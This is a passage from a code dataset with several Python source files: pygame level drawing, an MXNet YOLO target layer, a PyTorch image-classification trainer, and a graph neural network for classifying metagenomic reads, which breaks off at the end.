range(3):\n\t\tdraw_square(v,x,y,\"cyan\")\n\t\topenspace.append([x,y])\n\t\tx+=150\n\t\ty+=0\n\treturn openspace\n\ndef level_two(v,x,y):\n\topenspace = []\n\tfor i in range(3):\n\t\tdraw_square(v,x,y,\"cyan\")\n\t\topenspace.append([x,y])\n\t\tx+=150\n\t\ty-=50\n\treturn openspace\n\ndef level_three(v,x,y):\n\topenspace = []\n\n\tdraw_square(v,x,y,\"cyan\")\n\topenspace.append([x,y])\n\n\tx+=200\n\ty-=200\n\tdraw_square(v,x,y,\"cyan\")\n\topenspace.append([x,y])\n\t\n\tx+=200\n\ty+=200\n\tdraw_square(v,x,y,\"cyan\")\n\topenspace.append([x,y])\n\treturn openspace\n\n\t\n############## TESTING ###############\n# pygame.init()\n# size = [800, 500]\n# screen = pygame.display.set_mode(size)\n# pygame.display.set_caption(\"I love my mistress\")\n# loop = True\n# clock = pygame.time.Clock()\n\n# while loop == True:\n\t\n# \tfor event in pygame.event.get():\n# \t\tif event.type == pygame.QUIT:\n# \t\t\tloop = False\n\t\n# \tscreen.fill(WHITE)\n\t\n# \tlevel_one(screen,25,25)\n\t\n# \tclock.tick(60)\n\t\n# \tpygame.display.flip()\n\t\n# pygame.quit()\n\n\n\n\n\n","sub_path":"nowhere_kids/levels.py","file_name":"levels.py","file_ext":"py","file_size_in_byte":1458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"481572231","text":"# pylint: skip-file\nimport os\n# MXNET_CPU_WORKER_NTHREADS must be greater than 1 for custom op to work on CPU\nos.environ[\"MXNET_CPU_WORKER_NTHREADS\"] = \"8\"\n\nimport mxnet as mx\nimport numpy as np\nimport logging\nfrom ast import literal_eval\n\nclass YoloTarget(mx.operator.CustomOp):\n '''\n Python (inexact) implementation of yolo output layer.\n '''\n def __init__(self, th_iou, th_iou_neg, th_iou_pass, variances):\n #\n super(YoloTarget, self).__init__()\n self.th_iou = th_iou\n self.th_iou_neg = th_iou_neg\n self.th_iou_pass = th_iou_pass\n self.variances = variances\n\n # precompute nms candidates\n self.anchors = None\n self.anchors_t = None\n self.area_anchors_t = None\n\n def forward(self, is_train, req, in_data, out_data, aux):\n #\n # inputs: ['anchors', 'label', 'probs_cls']\n # outputs: ['target_reg', 'mask_reg', 'target_cls']\n n_batch, nch, n_anchors = in_data[2].shape\n\n labels_all = in_data[1].asnumpy().astype(np.float32) # (batch, num_label, 6)\n labels_all = labels_all[:, :, :5] # last one is difficulty, which I won't use.\n max_cids = mx.nd.argmax(in_data[2], axis=1).asnumpy().astype(int)\n\n # precompute some data for IOU computation\n if self.anchors_t is None:\n self.anchors = np.reshape(in_data[0].asnumpy(), (-1, 4)) # (n_anchor, 4)\n self.anchors_t = mx.nd.transpose(mx.nd.reshape(in_data[0].copy(), shape=(-1, 4)), (1, 0))\n self.area_anchors_t = \\\n (self.anchors_t[2] - self.anchors_t[0]) * (self.anchors_t[3] - self.anchors_t[1])\n\n # numpy arrays for outputs of the layer\n target_reg = np.zeros((n_batch, n_anchors, 4), dtype=np.float32)\n mask_reg = np.zeros_like(target_reg)\n # I will use focal loss, so basically everything is negative.\n target_cls = np.zeros((n_batch, 1, n_anchors), dtype=np.float32)\n\n # mark per-batch positive and ignore samples\n for i in range(n_batch):\n target_cls[i][0], target_reg[i], mask_reg[i] = self._forward_batch_pos( \\\n labels_all[i], max_cids[i], \\\n target_cls[i][0], target_reg[i], mask_reg[i])\n\n target_reg = np.reshape(target_reg, (n_batch, -1, 4))\n mask_reg = np.reshape(mask_reg, (n_batch, -1, 4))\n\n self.assign(out_data[0], req[0], mx.nd.array(target_reg, ctx=in_data[2].context))\n self.assign(out_data[1], req[1], mx.nd.array(mask_reg, ctx=in_data[2].context))\n self.assign(out_data[2], req[2], mx.nd.array(target_cls, ctx=in_data[2].context))\n self.assign(out_data[3], req[3], mx.nd.array(np.minimum(1.0, target_cls), ctx=in_data[2].context))\n\n def _forward_batch_pos(self, labels, max_cids, target_cls, target_reg, mask_reg):\n '''\n labels: (n_label, 5)\n max_cids: (n_anchor, )\n target_cls: (n_anchor, )\n target_reg: (n_anchor, 4)\n mask_reg: (n_anchor, 4)\n '''\n n_anchors = self.anchors_t.shape[1]\n\n labels = _get_valid_labels(labels)\n max_iou = np.zeros(n_anchors, dtype=np.float32)\n\n for i, label in enumerate(labels):\n gt_cls = int(label[0]) + 1\n #\n lsq = _autofit_ratio(label[1:], max_ratio=3.0)\n #\n iou = _compute_iou(lsq, self.anchors_t, self.area_anchors_t)\n\n # skip already occupied ones\n iou_mask = iou > max_iou\n max_iou = np.maximum(iou, max_iou)\n if label[0] == -1:\n continue\n gt_sz = np.maximum(label[3]-label[1], label[4]-label[2])\n\n # positive and regression samples\n pidx = np.where(np.logical_and(iou_mask, iou > self.th_iou))[0]\n ridx = np.where(np.logical_and(iou_mask, iou > self.th_iou_neg))[0]\n\n if len(pidx) > 5:\n pidx = np.random.choice(pidx, 5, replace=False)\n elif len(pidx) < 3:\n # TEST\n iou_v = _compute_iou(_adjust_ratio(lsq, 2.0), self.anchors_t, self.area_anchors_t)\n iou_h = _compute_iou(_adjust_ratio(lsq, 0.5), self.anchors_t, self.area_anchors_t)\n\n iou_t = np.maximum(np.maximum(iou, iou_v), iou_h)\n if np.max(iou_t) < self.th_iou_pass:\n continue\n\n sidx = np.argpartition(iou_t, iou_t.size - 5)\n pidx = sidx[-5:]\n pidx = pidx[np.where(iou_t[pidx] > self.th_iou_pass)[0]]\n # ridx = sidx[-5:]\n # pidx = pidx[np.where(iou_t[ridx] > self.th_iou_pass)[0]]\n\n # map ridx first, and then pidx\n ridx = ridx[target_cls[ridx] == 0]\n target_cls[ridx] = -1\n if len(pidx) > 0:\n target_cls[pidx] = gt_cls\n rt, rm = _compute_loc_target(label[1:], self.anchors[pidx, :], self.variances)\n target_reg[pidx, :] = rt\n mask_reg[pidx, :] = rm\n\n return target_cls, target_reg, mask_reg\n\n def backward(self, req, out_grad, in_data, out_data, in_grad, aux):\n '''\n Pass the gradient to their corresponding positions\n '''\n for i, r in enumerate(req):\n self.assign(in_grad[i], r, 0)\n\n\ndef _get_valid_labels(labels):\n #\n n_valid_label = 0\n for label in labels:\n if np.all(label == -1.0):\n break\n n_valid_label += 1\n return labels[:n_valid_label, :]\n\n\ndef _compute_iou(label, anchors_t, area_anchors_t):\n #\n iw = mx.nd.minimum(label[2], anchors_t[2]) - mx.nd.maximum(label[0], anchors_t[0])\n ih = mx.nd.minimum(label[3], anchors_t[3]) - mx.nd.maximum(label[1], anchors_t[1])\n I = mx.nd.maximum(iw, 0) * mx.nd.maximum(ih, 0)\n U = (label[3] - label[1]) * (label[2] - label[0]) + area_anchors_t\n\n iou = I / mx.nd.maximum((U - I), 1e-08)\n return iou.asnumpy() # (num_anchors, )\n\n\ndef _compute_loc_target(gt_bb, bb, variances):\n #\n loc_target = np.zeros_like(bb)\n aw = bb[:, 2] - bb[:, 0]\n ah = bb[:, 3] - bb[:, 1]\n loc_target[:, 0] = (gt_bb[2] + gt_bb[0] - bb[:, 2] - bb[:, 0]) * 0.5 / aw\n loc_target[:, 1] = (gt_bb[3] + gt_bb[1] - bb[:, 3] - bb[:, 1]) * 0.5 / ah\n loc_target[:, 2] = np.log((gt_bb[2] - gt_bb[0]) / aw)\n loc_target[:, 3] = np.log((gt_bb[3] - gt_bb[1]) / ah)\n return loc_target / variances, np.ones_like(loc_target)\n# def _compute_loc_target(gt_bb, bb):\n# loc_target = np.tile(np.reshape(gt_bb, (1, -1)), (bb.shape[0], 1))\n# loc_mask = np.ones_like(loc_target)\n# return loc_target, loc_mask\n\n\ndef _adjust_ratio(bb, ratio):\n #\n ww = bb[2] - bb[0]\n hh = bb[3] - bb[1]\n cx = (bb[0] + bb[2]) / 2.0\n cy = (bb[1] + bb[3]) / 2.0\n\n ww *= np.sqrt(ratio)\n hh /= np.sqrt(ratio)\n\n res = bb.copy()\n res[0] = cx - ww * 0.5\n res[1] = cy - hh * 0.5\n res[2] = cx + ww * 0.5\n res[3] = cy + hh * 0.5\n return res\n\n\ndef _autofit_ratio(bb, max_ratio=3.0):\n #\n ww = bb[2] - bb[0]\n hh = bb[3] - bb[1]\n cx = (bb[0] + bb[2]) / 2.0\n cy = (bb[1] + bb[3]) / 2.0\n\n ratio = ww / hh\n if ratio > max_ratio:\n hh = ww / max_ratio\n elif ratio < 1.0 / max_ratio:\n ww = hh / max_ratio\n\n res = bb.copy()\n res[0] = cx - ww * 0.5\n res[1] = cy - hh * 0.5\n res[2] = cx + ww * 0.5\n res[3] = cy + hh * 0.5\n return res\n\n\n@mx.operator.register(\"yolo_target\")\nclass YoloTargetProp(mx.operator.CustomOpProp):\n def __init__(self, th_iou=0.5, th_iou_neg=0.4, th_iou_pass=0.25, variances=(0.1, 0.1, 0.2, 0.2)):\n #\n super(YoloTargetProp, self).__init__(need_top_grad=False)\n self.th_iou = float(th_iou)\n self.th_iou_neg = float(th_iou_neg)\n self.th_iou_pass = float(th_iou_pass)\n self.variances = literal_eval(str(variances))\n\n def list_arguments(self):\n return ['anchors', 'label', 'probs_cls']\n\n def list_outputs(self):\n return ['target_reg', 'mask_reg', 'target_cls', 'target_rpn']\n\n def infer_shape(self, in_shape):\n n_batch, n_class, n_sample = in_shape[2]\n\n target_reg_shape = (n_batch, n_sample, 4)\n mask_reg_shape = target_reg_shape\n target_cls_shape = (n_batch, 1, n_sample)\n\n out_shape = [target_reg_shape, mask_reg_shape, target_cls_shape, target_cls_shape]\n return in_shape, out_shape, []\n\n def create_operator(self, ctx, shapes, dtypes):\n return YoloTarget(self.th_iou, self.th_iou_neg, self.th_iou_pass, self.variances)\n","sub_path":"layer/yolo_target_layer.py","file_name":"yolo_target_layer.py","file_ext":"py","file_size_in_byte":8499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"564991590","text":"\"\"\"Classification trainer/evaluator implementation module.\"\"\"\nimport logging\n\nimport torch\nimport torch.optim\n\nimport thelper.utils\nfrom thelper.train.base import Trainer\n\nlogger = logging.getLogger(__name__)\n\n\nclass ImageClassifTrainer(Trainer):\n \"\"\"Trainer interface specialized for image classification.\n\n This class implements the abstract functions of :class:`thelper.train.base.Trainer` required to train/evaluate\n a model for image classification or recognition. It also provides a utility function for fetching i/o packets\n (images, class labels) from a sample, and that converts those into tensors for forwarding and loss estimation.\n\n .. seealso::\n | :class:`thelper.train.base.Trainer`\n \"\"\"\n\n def __init__(self, session_name, save_dir, model, task, loaders, config, ckptdata=None):\n \"\"\"Receives session parameters, parses image/label keys from task object, and sets up metrics.\"\"\"\n super().__init__(session_name, save_dir, model, task, loaders, config, ckptdata=ckptdata)\n if not isinstance(self.task, thelper.tasks.Classification):\n raise AssertionError(\"expected task to be classification\")\n metrics = list(self.train_metrics.values()) + list(self.valid_metrics.values()) + list(self.test_metrics.values())\n for metric in metrics: # check all metrics for classification-specific attributes, and set them\n if hasattr(metric, \"set_class_names\") and callable(metric.set_class_names):\n metric.set_class_names(self.task.class_names)\n self.warned_no_shuffling_augments = False\n\n def _to_tensor(self, sample):\n \"\"\"Fetches and returns tensors of input images and class labels from a batched sample dictionary.\"\"\"\n if not isinstance(sample, dict):\n raise AssertionError(\"trainer expects samples to come in dicts for key-based usage\")\n if self.task.input_key not in sample:\n raise AssertionError(\"could not find input key '%s' in sample dict\" % self.task.input_key)\n input_val, label_idx = sample[self.task.input_key], None\n if isinstance(input_val, list):\n if self.task.gt_key in sample and sample[self.task.gt_key] is not None:\n label = sample[self.task.gt_key]\n if not isinstance(label, list) or len(label) != len(input_val):\n raise AssertionError(\"label should also be a list of the same length as input\")\n label_idx = [None] * len(input_val)\n for idx in range(len(input_val)):\n input_val[idx], label_idx[idx] = self._to_tensor({self.task.input_key: input_val[idx],\n self.task.gt_key: label[idx]})\n else:\n for idx in range(len(input_val)):\n input_val[idx] = torch.FloatTensor(input_val[idx])\n else:\n input_val = torch.FloatTensor(input_val)\n if self.task.gt_key in sample and sample[self.task.gt_key] is not None:\n label = sample[self.task.gt_key]\n if isinstance(label, torch.Tensor) and label.numel() == input_val.shape[0] \\\n and label.dtype == torch.int64:\n label_idx = label # shortcut with less checks (dataset is already using tensor'd indices)\n else:\n label_idx = label_idx or list()\n for class_name in label:\n assert isinstance(class_name, (int, torch.Tensor, str)), \\\n \"expected label to be a name (string) or index (int)\"\n if isinstance(class_name, (int, torch.Tensor)):\n if isinstance(class_name, torch.Tensor):\n assert torch.numel(class_name) == 1, \"unexpected scalar label, got vector\"\n class_name = class_name.item()\n # dataset must already be using indices, we will forgive this...\n assert 0 <= class_name < len(self.task.class_names), \\\n \"class name given as out-of-range index (%d) for class list\" % class_name\n label_idx.append(class_name)\n else:\n assert class_name in self.task.class_names, \\\n \"got unexpected label '%s' for a sample (unknown class)\" % class_name\n label_idx.append(self.task.class_indices[class_name])\n label_idx = torch.LongTensor(label_idx)\n return input_val, label_idx\n\n def train_epoch(self, model, epoch, iter, dev, loss, optimizer, loader, metrics, monitor=None, writer=None):\n \"\"\"Trains the model for a single epoch using the provided objects.\n\n Args:\n model: the model to train that is already uploaded to the target device(s).\n epoch: the epoch index we are training for (0-based).\n iter: the iteration count at the start of the current epoch.\n dev: the target device that tensors should be uploaded to.\n loss: the loss function used to evaluate model fidelity.\n optimizer: the optimizer used for back propagation.\n loader: the data loader used to get transformed training samples.\n metrics: the list of metrics to evaluate after every iteration.\n monitor: name of the metric to update/monitor for improvements.\n writer: the writer used to store tbx events/messages/metrics.\n \"\"\"\n if not loss:\n raise AssertionError(\"missing loss function\")\n if not optimizer:\n raise AssertionError(\"missing optimizer\")\n if not loader:\n raise AssertionError(\"no available data to load\")\n if not isinstance(metrics, dict):\n raise AssertionError(\"expect metrics as dict object\")\n epoch_loss = 0\n epoch_size = len(loader)\n self.logger.debug(\"fetching data loader samples...\")\n for idx, sample in enumerate(loader):\n input_val, label = self._to_tensor(sample)\n if label is None:\n raise AssertionError(\"groundtruth required when training a model\")\n optimizer.zero_grad()\n if isinstance(input_val, list): # training samples got augmented, we need to backprop in multiple steps\n if not input_val:\n raise AssertionError(\"cannot train with empty post-augment sample lists\")\n if not isinstance(label, list) or len(label) != len(input_val):\n raise AssertionError(\"label should also be a list of the same length as input\")\n if not self.warned_no_shuffling_augments:\n self.logger.warning(\"using training augmentation without global shuffling, \"\n \"gradient steps might be affected\")\n # see the docstring of thelper.transforms.operations.Duplicator for more information\n self.warned_no_shuffling_augments = True\n iter_loss = None\n iter_pred = None\n augs_count = len(input_val)\n for input_idx in range(augs_count):\n aug_pred = model(self._move_tensor(input_val[input_idx], dev))\n aug_loss = loss(aug_pred, self._move_tensor(label[input_idx], dev))\n aug_loss.backward() # test backprop all at once? might not fit in memory...\n if iter_pred is None:\n iter_loss = aug_loss.clone().detach()\n iter_pred = aug_pred.clone().detach()\n else:\n iter_loss += aug_loss.detach()\n iter_pred = torch.cat((aug_pred.detach(), iter_pred), dim=0)\n iter_loss /= augs_count\n label = torch.cat(label, dim=0)\n else:\n iter_pred = model(self._move_tensor(input_val, dev))\n iter_loss = loss(iter_pred, self._move_tensor(label, dev))\n iter_loss.backward()\n optimizer.step()\n if metrics:\n meta = {key: sample[key] if key in sample else None\n for key in self.task.meta_keys} if self.task.meta_keys else None\n iter_pred_cpu = self._move_tensor(iter_pred, dev=\"cpu\", detach=True)\n label_cpu = self._move_tensor(label, dev=\"cpu\", detach=True)\n for metric in metrics.values():\n metric.accumulate(iter_pred_cpu, label_cpu, meta=meta)\n if self.train_iter_callback is not None:\n self.train_iter_callback(sample=sample, task=self.task, pred=iter_pred,\n iter_idx=iter, max_iters=epoch_size,\n epoch_idx=epoch, max_epochs=self.epochs,\n **self.callback_kwargs)\n epoch_loss += iter_loss.item()\n monitor_output = \"\"\n if monitor is not None and monitor in metrics:\n monitor_output = \" {}: {:.2f}\".format(monitor, metrics[monitor].eval())\n self.logger.info(\n \"train epoch#{} (iter#{}) batch: {}/{} ({:.0f}%) loss: {:.6f}{}\".format(\n epoch,\n iter,\n idx + 1,\n epoch_size,\n ((idx + 1) / epoch_size) * 100.0,\n iter_loss.item(),\n monitor_output\n )\n )\n if writer:\n writer.add_scalar(\"iter/loss\", iter_loss.item(), iter)\n for metric_name, metric in metrics.items():\n if metric.is_scalar(): # only useful assuming that scalar metrics are smoothed...\n writer.add_scalar(\"iter/%s\" % metric_name, metric.eval(), iter)\n iter += 1\n epoch_loss /= epoch_size\n return epoch_loss, iter\n\n def eval_epoch(self, model, epoch, dev, loader, metrics, monitor=None, writer=None):\n \"\"\"Evaluates the model using the provided objects.\n\n Args:\n model: the model to evaluate that is already uploaded to the target device(s).\n epoch: the epoch number we are evaluating for (0-based).\n dev: the target device that tensors should be uploaded to.\n loader: the data loader used to get transformed valid/test samples.\n metrics: the dictionary of metrics to update every iteration.\n monitor: name of the metric to update/monitor for improvements.\n writer: the writer used to store tbx events/messages/metrics.\n \"\"\"\n if not loader:\n raise AssertionError(\"no available data to load\")\n with torch.no_grad():\n epoch_size = len(loader)\n self.logger.debug(\"fetching data loader samples...\")\n for idx, sample in enumerate(loader):\n if idx < self.skip_eval_iter:\n continue # skip until previous iter count (if set externally; no effect otherwise)\n input_val, label = self._to_tensor(sample)\n if isinstance(input_val, list): # evaluation samples got augmented, we need to get the mean prediction\n if not input_val:\n raise AssertionError(\"cannot eval with empty post-augment sample lists\")\n if not isinstance(label, list) or len(label) != len(input_val):\n raise AssertionError(\"label should also be a list of the same length as input\")\n # this might be costly for nothing, we could remove the check and assume user is not dumb\n if any([not torch.eq(l, label[0]).all() for l in label]):\n raise AssertionError(\"all labels should be identical! (why do eval-time augment otherwise?)\")\n label = label[0] # since all identical, just pick the first one and pretend its the only one\n preds = None\n for input_idx in range(len(input_val)):\n pred = model(self._move_tensor(input_val[input_idx], dev))\n if preds is None:\n preds = torch.unsqueeze(pred.clone(), 0)\n else:\n preds = torch.cat((preds, torch.unsqueeze(pred, 0)), 0)\n pred = torch.mean(preds, dim=0)\n else:\n pred = model(self._move_tensor(input_val, dev))\n if metrics:\n meta = {key: sample[key] if key in sample else None\n for key in self.task.meta_keys} if self.task.meta_keys else None\n pred_cpu = self._move_tensor(pred, dev=\"cpu\", detach=True)\n label_cpu = self._move_tensor(label, dev=\"cpu\", detach=True)\n for metric in metrics.values():\n metric.accumulate(pred_cpu, label_cpu, meta=meta)\n if self.eval_iter_callback is not None:\n self.eval_iter_callback(sample=sample, task=self.task, pred=pred,\n iter_idx=idx, max_iters=epoch_size,\n epoch_idx=epoch, max_epochs=self.epochs,\n **self.callback_kwargs)\n self.logger.info(\n \"eval epoch#{} batch: {}/{} ({:.0f}%){}\".format(\n epoch,\n idx + 1,\n epoch_size,\n ((idx + 1) / epoch_size) * 100.0,\n \" {}: {:.2f}\".format(monitor, metrics[monitor].eval()) if monitor is not None else \"\"\n )\n )\n","sub_path":"thelper/train/classif.py","file_name":"classif.py","file_ext":"py","file_size_in_byte":13983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"445234299","text":"#!/usr/bin/python3\nfrom __future__ import division\nimport sys\nimport os\nimport subprocess\nimport csv\nimport operator\nimport time\nimport random\nimport argparse\nimport re\nimport logging\nimport os.path as osp\nfrom sys import stdout\n\nimport numpy as np\nimport pickle\nimport torch\nimport torch.nn.functional as F\nfrom torch_geometric.nn import GCNConv\n\nfrom Bio import SeqIO\nfrom igraph import *\nfrom collections import defaultdict\nfrom bidirectionalmap.bidirectionalmap import BidirectionalMap\n\nfrom torch_geometric.data import ClusterData, ClusterLoader\nfrom torch_geometric.data import DataLoader\nfrom torch_geometric.data import Data\nfrom torch_geometric.data import InMemoryDataset\n\nspecies_map = BidirectionalMap()\n\noverlap_file_name = \"species_with_readnames.graphml\"\n\ndef index_to_mask(index, size):\n mask = torch.zeros((size, ), dtype=torch.bool)\n mask[index] = 1\n return mask\n\ndef resize(l, newsize, filling=None):\n if newsize > len(l):\n l.extend([filling for x in range(len(l), newsize)])\n else:\n del l[newsize:]\n\ndef peek_line(f):\n pos = f.tell()\n line = f.readline()\n f.seek(pos)\n return line\n\ntetra_list = []\ndef compute_tetra_list():\n for a in ['A', 'C', 'T', 'G']:\n for b in ['A', 'C', 'T', 'G']:\n for c in ['A', 'C', 'T', 'G']:\n for d in ['A', 'C', 'T', 'G']:\n tetra_list.append(a+b+c+d)\n\ndef compute_tetra_freq(seq):\n tetra_cnt = []\n for tetra in tetra_list:\n tetra_cnt.append(seq.count(tetra))\n return tetra_cnt\n\ndef compute_gc_bias(seq):\n seqlist = list(seq)\n gc_cnt = seqlist.count('G') + seqlist.count('C')\n gc_frac = gc_cnt/len(seq)\n return gc_frac\n\ndef compute_contig_features(read_file, read_names):\n compute_tetra_list()\n gc_map = defaultdict(float) \n tetra_freq_map = defaultdict(list)\n idx = 0\n for record in SeqIO.parse(read_file, 'fastq'):\n if record.name in read_names:\n gc_map[record.name] = compute_gc_bias(record.seq)\n tetra_freq_map[record.name] = compute_tetra_freq(record.seq)\n stdout.write(\"\\r%d\" % idx)\n stdout.flush()\n idx += 1\n return gc_map, tetra_freq_map\n\ndef read_features(gc_bias_f, tf_f):\n gc_map = pickle.load(open(gc_bias_f, 'rb'))\n tetra_freq_map = pickle.load(open(tf_f, 'rb'))\n return gc_map, tetra_freq_map\n\ndef write_features(file_name, gc_map, tetra_freq_map):\n gc_bias_f = file_name + '.gc'\n tf_f = file_name + '.tf'\n pickle.dump(gc_map, open(gc_bias_f, 'wb'))\n pickle.dump(tetra_freq_map, open(tf_f, 'wb'))\n \ndef read_or_compute_features(file_name, read_names):\n gc_bias_f = file_name + '.gc'\n tf_f = file_name + '.tf'\n if not os.path.exists(gc_bias_f) and not os.path.exists(tf_f):\n gc_bias, tf = compute_contig_features(file_name, read_names)\n write_features(file_name, gc_bias, tf)\n else:\n gc_bias, tf = read_features(gc_bias_f, tf_f)\n return gc_bias, tf\n\n\ndef build_species_map(file_name):\n overlap_graph = Graph()\n overlap_graph = overlap_graph.Read_GraphML(file_name)\n overlap_graph.simplify(multiple=True, loops=True, combine_edges=None)\n \n species = []\n for v in overlap_graph.vs:\n species.append(v['species'])\n\n # prepare vertex labels\n species_set = set(species)\n idx = 0\n for s in species_set:\n species_map[s] = idx\n idx += 1\n\n\nclass Metagenomic(InMemoryDataset):\n r\"\"\" Assembly graph built over raw metagenomic data using spades.\n Nodes represent contigs and edges represent link between them.\n\n Args:\n root (string): Root directory where the dataset should be saved.\n name (string): The name of the dataset (:obj:`\"bacteria-10\"`).\n transform (callable, optional): A function/transform that takes in an\n :obj:`torch_geometric.data.Data` object and returns a transformed\n version. The data object will be transformed before every access.\n (default: :obj:`None`)\n pre_transform (callable, optional): A function/transform that takes in\n an :obj:`torch_geometric.data.Data` object and returns a\n transformed version. The data object will be transformed before\n being saved to disk. (default: :obj:`None`)\n \"\"\"\n def __init__(self, root, name, transform=None, pre_transform=None):\n self.name = name\n super(Metagenomic, self).__init__(root, transform, pre_transform)\n self.data, self.slices = torch.load(self.processed_paths[0])\n\n @property\n def raw_dir(self):\n return osp.join(self.root, self.name, 'raw')\n\n @property\n def processed_dir(self):\n return osp.join(self.root, self.name, 'processed')\n\n @property\n def raw_file_names(self):\n return ['species_with_readnames.graphml', 'shuffled_reads.fastq', 'species_all.graphml', 'species_training.graphml']\n # return ['minimap2.graphml', 'sampled.fq', 'species_all.graphml', 'species_training.graphml']\n\n @property\n def processed_file_names(self):\n return ['pyg_meta_graph.pt']\n\n def download(self):\n pass\n\n def process(self):\n overlap_graph_file = osp.join(self.raw_dir, self.raw_file_names[0])\n read_file = osp.join(self.raw_dir, self.raw_file_names[1])\n all_file = osp.join(self.raw_dir, self.raw_file_names[2])\n training_file = osp.join(self.raw_dir, self.raw_file_names[3])\n # Read assembly graph and node features from the file into arrays\n\n overlap_graph = Graph()\n overlap_graph = overlap_graph.Read_GraphML(overlap_graph_file)\n # overlap_graph = overlap_graph.clusters().subgraph(1)\n\n source_nodes = []\n dest_nodes = []\n # Add edges to the graph\n overlap_graph.simplify(multiple=True, loops=True, combine_edges=None)\n # overlap_graph.write_graphml(all_file)\n\n # prepare edge list\n for e in overlap_graph.get_edgelist():\n source_nodes.append(e[0])\n dest_nodes.append(e[1])\n\n node_count = overlap_graph.vcount()\n print(\"Nodes: \" + str(overlap_graph.vcount()))\n print(\"Edges: \" + str(overlap_graph.ecount()))\n clusters = overlap_graph.clusters()\n print(\"Clusters: \" + str(len(clusters)))\n\n # get all vertex names\n vertex_names = []\n vertexes = overlap_graph.vs\n for v in overlap_graph.vs:\n vertex_names.append(v['readname'])\n gc_map, tetra_freq_map = read_or_compute_features(read_file, vertex_names)\n\n # prepare node features\n node_gc = []\n node_tfq = []\n for v in overlap_graph.vs:\n node_gc.append(gc_map[v['readname']])\n node_tfq.append(tetra_freq_map[v['readname']])\n\n # prepare vertex labels\n node_labels = []\n for v in overlap_graph.vs:\n node_labels.append(species_map[v['species']])\n \n # prepare torch objects\n x = torch.tensor(node_tfq, dtype=torch.float)\n g = torch.tensor(node_gc, dtype=torch.float)\n y = torch.tensor(node_labels, dtype=torch.float)\n n = torch.tensor(list(range(0, node_count)), dtype=torch.int)\n edge_index = torch.tensor([source_nodes, dest_nodes], dtype=torch.long)\n\n # prepare train/validate/test vectors\n # train_size = int(node_count/3)\n # val_size = train_size\n # train_index = torch.arange(train_size)\n # val_index = torch.arange(train_size, train_size+val_size)\n # test_index = torch.arange(train_size+val_size, node_count)\n # train_mask = index_to_mask(train_index, size=node_count)\n # val_mask = index_to_mask(val_index, size=node_count)\n # test_mask = index_to_mask(test_index, size=node_count)\n \n train_size = int(node_count/3)\n val_size = int(node_count/3)\n \n all_indexes = [i for i in range(node_count)]\n random.shuffle(all_indexes)\n train_index = all_indexes[0:train_size]\n val_index = all_indexes[train_size:train_size+val_size]\n test_index = all_indexes[train_size+val_size:]\n \n train_mask = index_to_mask(train_index, size=node_count)\n val_mask = index_to_mask(val_index, size=node_count)\n test_mask = index_to_mask(test_index, size=node_count)\n\n training_graph = overlap_graph\n vertex_set = training_graph.vs\n for i in range(node_count):\n if test_mask[i]:\n vertex_set[i]['species'] = 'Unknown'\n training_graph.write_graphml(training_file)\n learned_graph = training_graph\n\n data = Data(x=x, edge_index=edge_index, y=y, g=g, n=n)\n data.train_mask = train_mask\n data.val_mask = val_mask\n data.test_mask = test_mask\n data_list = []\n data_list.append(data)\n\n data, slices = self.collate(data_list)\n torch.save((data, slices), self.processed_paths[0])\n\n def __repr__(self):\n return '{}()'.format(self.name)\n\nclass Net(torch.nn.Module):\n def __init__(self):\n super(Net, self).__init__()\n self.conv1 = GCNConv(dataset.num_features, 128, cached=False)\n self.conv2 = GCNConv(128, int(dataset.num_classes), cached=False)\n\n self.reg_params = self.conv1.parameters()\n self.non_reg_params = self.conv2.parameters()\n\n def forward(self, data):\n x, edge_index = data.x.float(), data.edge_index\n x = F.relu(self.conv1(x, edge_index))\n x = F.dropout(x, training=self.training)\n x = self.conv2(x, edge_index)\n return F.log_softmax(x, dim=1)\n\ndef train():\n model.train()\n total_loss = total_examples = 0\n for data in loader:\n data = data.to(device)\n optimizer.zero_grad()\n out = model(data)\n loss = F.nll_loss(out[data.train_mask], data.y[data.train_mask].long(), reduction='none')\n loss.mean().backward()\n optimizer.step()\n total_loss += loss.mean().item() * data.num_nodes\n total_examples += data.num_nodes\n return total_loss / total_examples\n\n@torch.no_grad()\ndef test():\n model.eval()\n for data in loader:\n data = data.to(device)\n logits, accs = model(data), []\n for _, mask in data('train_mask', 'val_mask', 'test_mask'):\n _, pred = logits[mask].max(1)\n acc = pred.eq(data.y[mask]).sum().item() / mask.sum().item()\n accs.append(acc)\n\n return accs\n\n@torch.no_grad()\ndef output(output_dir, input_dir, data_name):\n overlap_graph_file = input_dir + '/' + data_name + '/raw/' + overlap_file_name\n for data in loader:\n data = data.to(device)\n _, preds = model(data).max(dim=1)\n acc = preds.eq(data.y).sum().item() / len(data.y)\n print(acc)\n learned_graph = Graph()\n learned_graph = learned_graph.Read_GraphML(overlap_graph_file)\n rev_species_map = species_map.inverse\n vertex_set = learned_graph.vs\n miss_pred_vertices = []\n print(data)\n perm = data.n.tolist()\n orgs = data.y.tolist()\n preds = preds.tolist()\n train = data.train_mask.tolist()\n # annotate graph\n for idx,org,pred,t in zip(perm,orgs,preds,train):\n if pred == org:\n vertex_set[idx]['pred'] = 'Correct'\n else:\n vertex_set[idx]['pred'] = 'Wrong'\n if t == 1:\n vertex_set[idx]['train'] = 'True'\n vertex_set[idx]['species'] = rev_species_map[org] \n else:\n vertex_set[idx]['train'] = 'False'\n vertex_set[idx]['species'] = rev_species_map[pred] \n # learned_file = output_dir + '/species_learned.graphml'\n # learned_graph.write_graphml(learned_file)\n \n t_idx_list = []\n for s in species_map:\n for v in vertex_set:\n if v['species'] == s:\n t_idx_list.append(v.index)\n break\n\n # print a subgraph\n edge_set = set()\n for idx in t_idx_list:\n bfsiter = learned_graph.bfsiter(vertex_set[idx], OUT, True)\n for v in bfsiter:\n if v[1] < 3: \n if v[1] > 0:\n edge_set.add(learned_graph.get_eid(v[2].index, v[0].index))\n # subvertex_set.add(v[2].index)\n # subvertex_set.add(v[0].index)\n\n subedge_list = list(edge_set)\n subgraph = learned_graph.subgraph_edges(subedge_list)\n print(subgraph.vcount())\n print(subgraph.ecount())\n # subvertex_list = list(subvertex_set)\n # subgraph = learned_graph.subgraph(subvertex_list)\n subgraph_file = output_dir + '/species_subgraph.graphml'\n subgraph.write_graphml(subgraph_file)\n\n# Sample command\n# -------------------------------------------------------------------\n# python meta_gnn.py --input 